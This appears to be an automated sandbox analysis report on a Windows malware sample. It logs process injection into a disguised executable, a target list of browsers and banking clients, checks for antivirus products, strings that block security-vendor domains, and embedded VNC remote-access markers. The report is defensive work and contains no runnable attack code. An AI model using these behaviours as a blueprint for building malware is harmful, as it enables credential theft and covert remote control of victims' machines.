Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1275000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AD0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AD1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AD2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B25000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B30000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B31000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B32000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B85000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 725000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1090000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1091000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1092000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1260000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1261000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1262000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 12B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1190000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1191000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1192000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 11E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: DE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1500000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1501000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1502000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1555000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F40000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F41000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F95000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A20000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A21000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A22000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A75000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F35000Jump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe | Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 22_2_012F78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe | Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 25_2_015A78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe | Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 27_2_00AF78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe | Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 29_2_012B78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe | Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 31_2_011278A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe | Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 33_2_013078A0
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe | File opened: CA HIPS KmxAgent
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe | File opened: Agnitum Outpost firewal \pipe\acsipc_server
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe | File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe | File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe | Window found: AVP NULL ____AVP.Root
Source: C:\Windows\apppatch\svchost.exe | File opened: CA HIPS KmxAgent
Source: C:\Windows\apppatch\svchost.exe | File opened: Agnitum Outpost firewal \pipe\acsipc_server
Source: C:\Windows\apppatch\svchost.exe | File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
Source: C:\Windows\apppatch\svchost.exe | File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Source: C:\Windows\apppatch\svchost.exe | Window found: AVP NULL ____AVP.Root
Source: Z8eHwAvqAh.exe, Z8eHwAvqAh.exe, 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Z8eHwAvqAh.exe, 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000000A.00000000.2058655974.0000000001431000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000B.00000000.2060160005.0000000001071000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000D.00000000.2062444693.0000000001491000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000000A.00000000.2058655974.0000000001431000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000B.00000000.2060160005.0000000001071000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000D.00000000.2062444693.0000000001491000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Manager
Source: Z8eHwAvqAh.exe, 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Z8eHwAvqAh.exe, 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000000A.00000000.2058655974.0000000001431000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000B.00000000.2060160005.0000000001071000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000D.00000000.2062444693.0000000001491000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe | Code function: 1_2_00414050 cpuid 1_2_00414050
Source: C:\Windows\apppatch\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\apppatch\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_00402360 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,1_2_00402360
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_00403A20 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,1_2_00403A20
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012F6970 memset,GetProcessHeap,HeapAlloc,memset,GetTimeZoneInformation,Sleep,#680,GetTickCount,_snprintf,GetTempPathA,GetTempFileNameA,SetFileAttributesA,DeleteFileA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,SetFileAttributesA,DeleteFileA,Sleep,Sleep,22_2_012F6970
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_004034C0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,1_2_004034C0
Source: Z8eHwAvqAh.exe Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality

Source: Z8eHwAvqAh.exe String found in binary or memory: RFB 003.006
Source: Z8eHwAvqAh.exe, 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: RFB 003.006
Source: Z8eHwAvqAh.exe, 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: $BRFB 003.006
Source: Z8eHwAvqAh.exe, 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: Z8eHwAvqAh.exe, 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000003.1318599040.0000000000884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1318599040.0000000000884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000002.2108549268.0000000001590000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000002.2108549268.0000000001590000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000002.2107924454.0000000001530000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000002.2107924454.0000000001530000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2110291091.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2110291091.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2110131950.0000000000A40000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2110131950.0000000000A40000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000002.2114094009.00000000012A0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000002.2114094009.00000000012A0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000002.2113959857.0000000001200000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000002.2113959857.0000000001200000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000002.2117128490.00000000010B0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000002.2117128490.00000000010B0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000002.2117328795.0000000001110000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000002.2117328795.0000000001110000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2122586333.00000000012F0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2122586333.00000000012F0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2122526350.0000000001290000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2122526350.0000000001290000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2132206757.00000000020D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2132206757.00000000020D0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2130828289.00000000006A0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2130828289.00000000006A0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2136733036.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2136733036.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2136949497.0000000000B40000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2136949497.0000000000B40000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2141769100.0000000000F30000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2141769100.0000000000F30000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2141687377.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2141687377.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
